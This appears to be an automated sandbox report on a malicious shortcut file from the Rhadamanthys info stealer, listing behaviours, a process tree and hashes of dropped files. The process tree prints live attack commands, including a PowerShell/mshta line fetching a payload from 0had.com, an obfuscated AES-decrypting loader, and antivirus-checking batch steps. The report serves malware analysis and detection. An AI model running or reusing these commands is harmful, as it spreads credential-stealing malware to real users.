Analysis
  max time kernel: 148s
  max time network: 156s
  platform: windows10-2004_x64
  resource: win10v2004-20240412-en
  resource tags: arch:x64, arch:x86, image:win10v2004-20240412-en, locale:en-us, os:windows10-2004-x64, system
  submitted: 19-04-2024 01:55
  Static task: static1
  Behavioral task: behavioral1
    Sample: c4e79437d564a08dacec5a0bb754c6f03d13333276c9a48253a247bef5742c0a.lnk
    Resource: win7-20240221-en
  Behavioral task: behavioral2
    Sample: c4e79437d564a08dacec5a0bb754c6f03d13333276c9a48253a247bef5742c0a.lnk
    Resource: win10v2004-20240412-en
General
  Target: c4e79437d564a08dacec5a0bb754c6f03d13333276c9a48253a247bef5742c0a.lnk
  Size: 1KB
  MD5: b6c511480d3c76834e42b773836e76a9
  SHA1: f135c8ece764465c4e9ba8fded937f0ad4a5ab79
  SHA256: c4e79437d564a08dacec5a0bb754c6f03d13333276c9a48253a247bef5742c0a
  SHA512: f11d8780b11eee262276b0f16b65504b1f1e31ba6a25bbf7af3577079121a94f17ddcfb49fdbda08ec3c438bf1b2faa10b49281d29168f0d541cef089558c18d
Malware Config
  Extracted: http://0had.com/stage
Signatures
- Rhadamanthys
  Rhadamanthys is an info stealer written in C++ first seen in August 2022.
- Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoCs)
  Processes:
    description            pid   process     target process
    PID 3644 created 2692  3644  Cheers.pif  sihost.exe
- Blocklisted process makes network request (2 IoCs)
  Processes:
    flow  pid   process
    26    3940  mshta.exe
    36    4276  powershell.exe
- Downloads MZ/PE file
- Checks computer location settings (2 TTPs, 3 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Processes:
    description        ioc                                                                                                process
    Key value queried  \REGISTRY\USER\S-1-5-21-3198953144-1466794930-246379610-1000\Control Panel\International\Geo\Nation  cmd.exe
    Key value queried  \REGISTRY\USER\S-1-5-21-3198953144-1466794930-246379610-1000\Control Panel\International\Geo\Nation  mshta.exe
    Key value queried  \REGISTRY\USER\S-1-5-21-3198953144-1466794930-246379610-1000\Control Panel\International\Geo\Nation  DisabilityCharge.exe
- Executes dropped EXE (2 IoCs)
  Processes:
    pid   process
    1232  DisabilityCharge.exe
    3644  Cheers.pif
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Program crash (1 IoCs)
  Processes:
    pid  pid_target  process       target process
    644  3644        WerFault.exe  Cheers.pif
- Checks processor information in registry (2 TTPs, 2 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes:
    description        ioc                                                                    process
    Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0       AcroRd32.exe
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz  AcroRd32.exe
- Enumerates processes with tasklist (1 TTPs, 2 IoCs)
  Processes:
    pid   process
    2784  tasklist.exe
    3576  tasklist.exe
- Modifies Internet Explorer settings (1 IoCs)
  Processes:
    description  ioc                                                                                                                                          process
    Key created  \REGISTRY\USER\S-1-5-21-3198953144-1466794930-246379610-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION  AcroRd32.exe
- Modifies registry class (1 IoCs)
  Processes:
    description  ioc                                                                                process
    Key created  \REGISTRY\USER\S-1-5-21-3198953144-1466794930-246379610-1000_Classes\Local Settings  powershell.exe
- Runs ping.exe (1 TTPs, 1 IoCs)
- Suspicious behavior: EnumeratesProcesses (42 IoCs)
  Processes (identical rows collapsed, with occurrence counts):
    pid   process         occurrences
    1544  powershell.exe  2
    4276  powershell.exe  2
    3644  Cheers.pif      14
    1392  AcroRd32.exe    20
    5116  dialer.exe      4
- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Processes:
    description              pid   process
    Token: SeDebugPrivilege  1544  powershell.exe
    Token: SeDebugPrivilege  4276  powershell.exe
    Token: SeDebugPrivilege  2784  tasklist.exe
    Token: SeDebugPrivilege  3576  tasklist.exe
- Suspicious use of FindShellTrayWindow (4 IoCs)
  Processes (identical rows collapsed, with occurrence counts):
    pid   process       occurrences
    1392  AcroRd32.exe  1
    3644  Cheers.pif    3
- Suspicious use of SendNotifyMessage (3 IoCs)
  Processes (identical rows collapsed, with occurrence counts):
    pid   process     occurrences
    3644  Cheers.pif  3
- Suspicious use of SetWindowsHookEx (5 IoCs)
  Processes (identical rows collapsed, with occurrence counts):
    pid   process       occurrences
    1392  AcroRd32.exe  5
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes (identical rows collapsed, with occurrence counts):
    description                       pid   process               target process        occurrences
    PID 5092 wrote to memory of 4692  5092  cmd.exe               forfiles.exe          2
    PID 4692 wrote to memory of 1544  4692  forfiles.exe          powershell.exe        2
    PID 1544 wrote to memory of 3940  1544  powershell.exe        mshta.exe             2
    PID 3940 wrote to memory of 4276  3940  mshta.exe             powershell.exe        2
    PID 4276 wrote to memory of 1392  4276  powershell.exe        AcroRd32.exe          3
    PID 4276 wrote to memory of 1232  4276  powershell.exe        DisabilityCharge.exe  3
    PID 1232 wrote to memory of 1584  1232  DisabilityCharge.exe  cmd.exe               3
    PID 1392 wrote to memory of 2668  1392  AcroRd32.exe          RdrCEF.exe            3
    PID 2668 wrote to memory of 4292  2668  RdrCEF.exe            RdrCEF.exe            41
    PID 2668 wrote to memory of 4868  2668  RdrCEF.exe            RdrCEF.exe            3
Processes (process tree; [N] is the depth of the entry in the tree)
- [1] C:\Windows\system32\sihost.exe
  Command line: sihost.exe
  - [2] C:\Windows\SysWOW64\dialer.exe
    Command line: "C:\Windows\system32\dialer.exe"
    Signatures: Suspicious behavior: EnumeratesProcesses
- [1] C:\Windows\system32\cmd.exe
  Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\c4e79437d564a08dacec5a0bb754c6f03d13333276c9a48253a247bef5742c0a.lnk
  Signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
  - [2] C:\Windows\System32\forfiles.exe
    Command line: "C:\Windows\System32\forfiles.exe" /p C:\Windows\System32 /m calc.exe /c "powershell . mshta http://0had.com/stage"
    Signatures: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: . mshta http://0had.com/stage
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - [4] C:\Windows\system32\mshta.exe
        Command line: "C:\Windows\system32\mshta.exe" http://0had.com/stage
        Signatures: Blocklisted process makes network request; Checks computer location settings; Suspicious use of WriteProcessMemory
        - [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function GWVkC($OQIVk){return -split ($OQIVk -replace '..', '0x$& ')};$oUlJnFU = GWVk[…]pVdc = [System.Security.Cryptography.Aes]::Create();$PpVdc.Key = GWVkC('72417566717042666B7664427A694669');$PpVdc.IV = New-Object byte[] 16;$tRHLMuaf = $PpVdc.CreateDecryptor();$euSjzsAcc = $tRHLMuaf.TransformFinalBlock($oUlJnFU, 0, $oUlJnFU.Length);$XdUHAvYuR = [System.Text.Encoding]::Utf8.GetString($euSjzsAcc);$tRHLMuaf.Dispose();& $XdUHAvYuR.Substring(0,3) $XdUHAvYuR.Substring(3)
          Signatures: Blocklisted process makes network request; Modifies registry class; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
          - [6] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
            Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\SA160.pdf"
            Signatures: Checks processor information in registry; Modifies Internet Explorer settings; Suspicious behavior: EnumeratesProcesses; Suspicious use of FindShellTrayWindow; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
            - [7] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
              Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
              Signatures: Suspicious use of WriteProcessMemory
              - [8] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=E245D665A16716F447C21EBF6C14233A --mojo-platform-channel-handle=1740 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
              - [8] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=253E4F628EA0E2D8CF63BDBB81AE5A14 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=253E4F628EA0E2D8CF63BDBB81AE5A14 --renderer-client-id=2 --mojo-platform-channel-handle=1764 --allow-no-sandbox-job /prefetch:1
              - [8] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=9EE6EBD83BD3CB4BE08FBB3D1F0D145A --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=9EE6EBD83BD3CB4BE08FBB3D1F0D145A --renderer-client-id=4 --mojo-platform-channel-handle=2296 --allow-no-sandbox-job /prefetch:1
              - [8] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=53EC0F4E1A36CEEAC524EBB74D839C5D --mojo-platform-channel-handle=2428 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
              - [8] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=771B443710D1FD2BB21D02FCFC455B84 --mojo-platform-channel-handle=1816 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
              - [8] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=BDE6EBD58198AAEC906B8B75492765F8 --mojo-platform-channel-handle=2672 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
          - [6] C:\Users\Admin\AppData\Roaming\DisabilityCharge.exe
            Command line: "C:\Users\Admin\AppData\Roaming\DisabilityCharge.exe"
            Signatures: Checks computer location settings; Executes dropped EXE; Suspicious use of WriteProcessMemory
            - [7] C:\Windows\SysWOW64\cmd.exe
              Command line: "C:\Windows\system32\cmd.exe" /c move Observed Observed.bat && Observed.bat
              - [8] C:\Windows\SysWOW64\tasklist.exe
                Command line: tasklist
                Signatures: Enumerates processes with tasklist; Suspicious use of AdjustPrivilegeToken
              - [8] C:\Windows\SysWOW64\findstr.exe
                Command line: findstr /I "wrsa.exe opssvc.exe"
              - [8] C:\Windows\SysWOW64\tasklist.exe
                Command line: tasklist
                Signatures: Enumerates processes with tasklist; Suspicious use of AdjustPrivilegeToken
              - [8] C:\Windows\SysWOW64\findstr.exe
                Command line: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
              - [8] C:\Windows\SysWOW64\cmd.exe
                Command line: cmd /c md 5139075
              - [8] C:\Windows\SysWOW64\findstr.exe
                Command line: findstr /V "AndreaAccessibleOriginallyElizabeth" Ons
              - [8] C:\Windows\SysWOW64\cmd.exe
                Command line: cmd /c copy /b 5139075\Cheers.pif + Software + Cap + Typing + Cingular + Dominican 5139075\Cheers.pif
              - [8] C:\Windows\SysWOW64\cmd.exe
                Command line: cmd /c copy /b Customs + Placing + Anatomy + Church 5139075\M
              - [8] C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\5139075\Cheers.pif
                Command line: 5139075\Cheers.pif 5139075\M
                Signatures: Suspicious use of NtCreateUserProcessOtherParentProcess; Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage
                - [9] C:\Windows\SysWOW64\WerFault.exe
                  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3644 -s 916
                  Signatures: Program crash
              - [8] C:\Windows\SysWOW64\PING.EXE
                Command line: ping -n 5 127.0.0.1
                Signatures: Runs ping.exe
- [1] C:\Windows\System32\CompPkgSrv.exe
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
- [1] C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3644 -ip 3644
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
- C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
  Filesize: 36KB
MD5b30d3becc8731792523d599d949e63f5
SHA119350257e42d7aee17fb3bf139a9d3adb330fad4
SHA256b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3
SHA512523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e
- C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
  Filesize: 56KB
MD5752a1f26b18748311b691c7d8fc20633
SHA1c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
SHA256111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
SHA512a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5
- C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
  Filesize: 64KB
MD5827c47e299f124cd3464368b5491c038
SHA1a52cb838b7412f428e5c3a5b95f476fc7a095079
SHA2568560f1c759dbf52dc28530a840f682ca27c1c44e36537d46fa4303149dd1db55
SHA5122f0a505ed78855a1470ef7f397a7b32c2e50cafc544b90c80d3fcad16ea05f5a64e1217f228c1f38a4f7f6407bb518c86557a04148b05abe721ec9f9996fa56c
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
- C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\5139075\Cheers.pif
  Filesize: 872KB
MD56ee7ddebff0a2b78c7ac30f6e00d1d11
SHA1f2f57024c7cc3f9ff5f999ee20c4f5c38bfc20a2
SHA256865347471135bb5459ad0e647e75a14ad91424b6f13a5c05d9ecd9183a8a1cf4
SHA51257d56de2bb882f491e633972003d7c6562ef2758c3731b913ff4d15379ada575062f4de2a48ca6d6d9241852a5b8a007f52792753fd8d8fee85b9a218714efd0
- C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\5139075\Cheers.pif
  Filesize: 103B
MD59fb8e634ff869eec8cb42ab7af0b6fb5
SHA1d7553a9bb0e28264e33ae55fd9f472b4b64370ba
SHA256610a3efda69516655dd03cfc7d26224b2efe35934521af69fd9e96421fe1f3df
SHA51276edab533503200b549171988f355176ba80a3976dc1ed3c74578b1da858fefd50bdc9bdee0418d4fa4543f7630a7b78fce7da758217627f71b2bd15fc773422
- C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\5139075\M
  Filesize: 867KB
MD5b18b385dc3c027bc4cd4362e23677edc
SHA165b09d44a81ca8528cf472f91e783a5199411f45
SHA256c43b8b1a8b8ab1455009a1463c77166c87d21b5ded408a9b9d2eb91213e783de
SHA51266889a43e26f37bd4ea756719c07e389c2292a2b971f7367c6779d63ba1de82f5509e62dbb5ab994b4d5e819614cb8a2051b21a7e7d5197e2067054314baa46e
- C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Anatomy
  Filesize: 268KB
MD53d0fe94011bfc11f960f3692773becf6
SHA1eda278f584c80b7a5ec1a48c16c1453fd79d30fe
SHA256f1e2acd5399b8fd82a7d3be16aba6cf70dd4f5fea82211979b89e6293b736e85
SHA5124f15232e5966d2c024e929de468a4ff427d5ec714b15c3a19c55ce6c03342f01a4dd9784672aa3a4ec738db9c926727fc0108d36d751f2669b27837470bce0d8
- C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Cap
  Filesize: 152KB
MD5d7b3e4a1f20444dd37b4ef305b6f8199
SHA1bfd1d1bdff7c9d7e1ab6b46399252e94bbab8258
SHA256b64c28e45770c23ba7b4cc1b80efd0edafaa0ad8109d3c9e340b45ae40565929
SHA51224e83d25a23170f0d5c5f9f2afac13e72c017c98e443014e82a7b1b5a3a7aa9aafdfd795517e0a2b93bae2f742809c6a9e0627669c73dc3a8a0b57e9b2b8663a
- C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Church
  Filesize: 113KB
MD5b020ac666f105e582800755e46b87e54
SHA133c9afc7390f7fefe0b11ee2f9e32f8107d5ec21
SHA2561713e9701d98f06a20391a048b2f5cb213b0ccf23f45df39df3cdbd55b23935c
SHA5120d6c163717bef8e894cdf95b619ac1d7728bc1b88a2485606b1f2270d5c683caab7c4d693f467ec89d83a7ae34ca4e1afad1df3a7d25e8a7fc750826a89a59b9
- C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Cingular
  Filesize: 262KB
MD55b18970d8c464ca95ef183c6eddf2c79
SHA130f9ef49ce58ded149dd60a32359052c7fda6b25
SHA25653a87d85121c6e590a928d3fae1f72ab3c266c980cc6a89f39cd74a2127d6b1e
SHA5122f636bb7527a194467ce15046d9bf1368fca37a9b160c22aeb022a1c15a0c6cbf978373fb6d59ac692c9e7de37310c9fcc9f26c1c1d54ecace41f94ccc5fedbe
- C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Customs
  Filesize: 239KB
MD54c4ea6968e54f5f5c4c254587fee63dc
SHA1d21927f93dfb1626405cf09f3379d6bc7dd8a505
SHA2563a6b764666b1675287f39a952e072fcd41332b4d0ce2b4e59a96aa5a27af8707
SHA5128b3f479dd3accfffe0235f2a3e102c306c288788d533ae78f9b8d8bbd95f36a4a613f6c1c1f2443566e17971c6116274b8b901b83608a6189e4d4927e47e42b0
- C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Dominican
  Filesize: 137KB
MD53c699f1767c677adfed1c113de6d184f
SHA1ca15988fb3c81b6b4e0d7c5914e0bb2e07b35d1b
SHA256740648b4a35012828dc95ef4258677d80659d820461ccfc9f98216facf0fea9a
SHA5129ba925d63f2f9c0dbb244d6cea56d4bfd0b39de973e9c68c743ef6a1014c2a72b93072606af17bc770a837320c3cf8dc5f51976389cd599922c7b668d263c2af
- C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Observed
  Filesize: 25KB
MD5ad5b9509809e2c43efd8e4e0cbb697aa
SHA1440d24a228fd1a0b125d535e55b887713b237f37
SHA256eb882bf341c37bcd1c625e156f33db1b338d0e435aa074fa379cc3e73d6d9dad
SHA512553bf92ac85b4b5ce9605fd0630e9f0396f282ece3f2cd4c0741cfd2b29acdb2246c7df749b0ae6d0d7cd3327f0fd34588ab205659f7cdd91a43e92b34dcd695
- C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Ons
  Filesize: 140B
MD561bab20dd66e4690943a6165fd4ff9ca
SHA101237b42f749d18c2529aa6233349ecc5de29db2
SHA2564dab1074edd81fc8d7b5c1e989b025f96ff09ae42e58934668bcc2f696a167c9
SHA5129419cde00c25107d5ea4dd683b43d437fb508b951f5d7fbe919169724218b8bb13f2e91b3068f7a31433c3b899e9ae26e18cf94f9a9468ac5624efaa8c8f2ed2
- C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Placing
  Filesize: 247KB
MD5b68df1f6cc55a943bd8bd6a1ba4baeb2
SHA1ed2f9c007bef6a9e8d52aba49704b56c9babea6d
SHA256fdd8a7a40fdee48bd3a93b70e27c8efbb1aa860e2f7f587e1eecacbee3d6dd68
SHA5120f622f1d33bcbe46483fa9f578eaa845e49c3617d6f0c76f46d2a32bf33e350a74bb44b4b0c43ddb25fa9f808de763d49f2af37072748b3f98010a8eb6ded273
- C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Software
  Filesize: 101KB
MD5722238ba226d0e01df25a8d6e95d609f
SHA12f5e912ff0660bdc3f85ccf6d61bcb10fab8edef
SHA25600559112065d90d8ba296b46949907ea4141c19323e999670a918bd50c5ae162
SHA5123200e2063b157198c62a69fce4435d1c139c6e7b7f00e0a8e0d05fb0bf54fc886adeea0a2a4e4e8ec055ae0c94eabb1867e6d019920aade7ccef33e91e3be042
- C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Typing
  Filesize: 220KB
MD5f0c0d7aff4f13ac8f3c247cb9fca2943
SHA194b642aa412319f2bfd814fefefa1b66c9fd7cc7
SHA2562e933f3194ac2649b3f2c3f0289174b787ef71314143d63980b4d0c3ca698582
SHA51236f1296f06acccfb3d621aaaf60ea24b354633568b0a946b2f2239e0e61f62dac2f6c418f1b9d2512572b308f176eeb657d479e1448bc330c63b9b01ae585b39
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 64B
MD55caad758326454b5788ec35315c4c304
SHA13aef8dba8042662a7fcf97e51047dc636b4d4724
SHA25683e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA5124e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693
- C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5voe0aqd.04a.ps1
